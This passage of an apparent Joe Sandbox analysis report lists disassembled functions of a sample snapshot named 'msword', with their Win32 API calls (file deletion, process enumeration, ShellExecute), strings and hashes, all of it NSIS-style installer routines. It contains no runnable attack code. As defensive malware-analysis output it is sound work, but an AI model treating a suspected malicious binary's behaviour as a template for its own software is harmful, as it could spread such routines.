                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                        • String ID: 82D$@%F$@rD$A
                                                                                        • API String ID: 3347642858-1086125096
                                                                                        • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                        • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                        Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                        • API String ID: 1916479912-1189179171
                                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                        Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                        • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                        • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                                        Strings
                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                        • \*.*, xrefs: 00406D03
                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                        • API String ID: 2035342205-3294556389
                                                                                        • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                        • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                        Strings
                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstance
                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                        • API String ID: 542301482-1377821865
                                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                        Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                        • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                        Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                        • API String ID: 20674999-2124804629
                                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                        Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                        • String ID: @%F$N$open
                                                                                        • API String ID: 3928313111-3849437375
                                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                        Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                                        • API String ID: 565278875-1653569448
                                                                                        • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                        • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
